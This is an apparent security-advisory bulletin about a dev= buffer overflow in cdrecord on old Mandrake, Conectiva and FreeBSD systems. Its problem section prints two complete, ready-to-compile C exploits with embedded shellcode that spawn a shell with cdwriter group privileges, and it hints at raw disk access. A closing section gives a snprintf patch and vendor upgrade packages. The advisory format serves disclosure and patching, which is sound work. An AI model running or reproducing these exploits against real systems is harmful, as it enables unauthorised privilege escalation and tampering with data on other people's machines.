COMMAND

    /usr/bin/cdrecord

SYSTEMS AFFECTED

    Mandrake 6.1, 7.0, Conectiva Linux 5.0

PROBLEM

    'noir' found following.  You may say gid=80 (cdwriter) is  useless
    but anyways here is the exploit:

    /*  /usr/bin/cdrecord exploit by noir
     *  x86/Linux
     *  noir@gsu.linux.org.tr | noir@olympos.org
     *  dev= param overflow
     *  this script will get you gid = 80 group cdwriter
     *  tested on Mandrake 7.0 (Air)
     *  greetz: dustdevil, Cronos, moog, still, BlaCK #olympos irc.sourtimes.org
     *
     *
     */

    #include <stdio.h>
    #include <string.h>

    #define NOP             0x90
    #define RET     0xbffffe66 //play with argv[1] +10, -10 if default is not ok
    int
    main(int argc, char *argv[])

    {
            unsigned char shell[] =
            "\x31\xc0\xb0\x50\x89\xc3\x89\xc1\xb0\x47\xcd\x80"  /*setregid(80, 80) */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";

            char egg[400];
        char buf[80];
            int i, a;
            long ret = RET;

         if(argv[1])
            ret = ret - atoi(argv[1]);

            memset(egg, NOP, 400);

            for(i = 0  ; i < 80 ; i+=4)
                    *(long *) &buf[i] = ret;

            for( i = 300, a = 0; a < strlen(shell) ; i++, a++ )
        egg[i] = shell[a];

            buf[72] = 0x00;
            egg[399] = 0x00;
            printf("eip: 0x%x\n", ret);

            setenv("EGG", egg, 1);
            execl("/usr/bin/cdrecord", "cdrecord","dev=", buf, "/etc/passwd", 0);

    }

    If you've got  cdwriter access, and  they have a  SCSI hard drive,
    then you should theoretically have read/write access to their  raw
    partitions (no need to go into depth on what that should mean).

    Below is port for FreeBSD, but  it will work only if your  FreeBSD
    has cdrecord suid which is not default:

    /* freebsd cdrecord exploit port by sectorx of XOR
    (http://xorteam.cjb.net) */

    #include <stdio.h>
    #include <stdlib.h>

    #define LENGTH 76
    #define EGGIE 500

    long esp() { __asm__("movl %esp, %eax"); }
    char devilspawn[];

    int main(int argc, char *argv[])
    {
       long addr;
       char buf[LENGTH];
       char egg[EGGIE];
       int i,offset;

       printf("cdrecord exploit by sectorx (FreeBSD)\n");
       if (argc < 2) {
          printf("error: offset must be supplied as a
    parameter\n");
          printf("*note* FreeBSD 3.3-RELEASE\'s offset is
    600\n\n");
          return;
       }
       offset = atoi(argv[1]);
       addr = esp()+offset;
       printf("Using offset 0x%x [%d], eip =
    0x%x\n",offset,offset,addr);
       /* build the overflow string */
       for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
       buf[LENGTH-1] = '\0';
       /* build the egg string */
       memset(&egg,0x90,sizeof(egg));

    memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
       egg[EGGIE-1] = '\0';

       setenv("EGG",egg,1);

    execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
    }
    /* FreeBSD shellcode by mudge of L0pht */
    char devilspawn[]=
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
       "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

SOLUTION

    The person  who originally  reported this  is only  using "medium"
    security level.  Under Linux-Mandrake, security level 4/5 involves
    a filesystem  scan and  possibly chmod,  independent of individual
    programs in most cases.  However, on seclev. 3/4/5, it works  just
    FINE ! gid=80 so security level is not relevant.

    --- cdrecord-1.8.1.orig/cdrecord/defaults.c	Sun Apr 16 02:08:58 2000
    +++ cdrecord-1.8.1/cdrecord/defaults.c	Tue May 30 13:30:45 2000
    @@ -109,7 +109,7 @@
  			    return;
  		    x++;
  	    }
     -	sprintf(dname, "%s=", p);
     +	snprintf(dname, sizeof(dname), "%s=", p);

    Please upgrade to:

        package: 7.0/RPMS/cdrecord-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/cdrecord-cdda2wav-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/cdrecord-devel-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/mkisofs-1.12.1-4mdk.i586.rpm
        source package: 7.0/SRPMS/cdrecord-1.8.1-4mdk.src.rpm

    To  upgrade  automatically,  use  MandrakeUpdate.   If you want to
    upgrade manually,  download the  updated package  from one  of FTP
    server  mirrors  and  uprade  with  "rpm  -Uvh package_name".  All
    mirrors are listed on http://www.mandrake.com/en/ftp.php3

    Direct download links to updated Directiva Linuxpackages:

        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdda2wav-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdrecord-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdrecord-devel-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/mkisofs-1.8-2cl.i386.rpm

        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdda2wav-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdrecord-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdrecord-devel-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/mkisofs-1.8-2cl.src.rpm

    For Linux-Mandrake:

        7.1/RPMS/cdrecord-1.8.1-4mdk.i586.rpm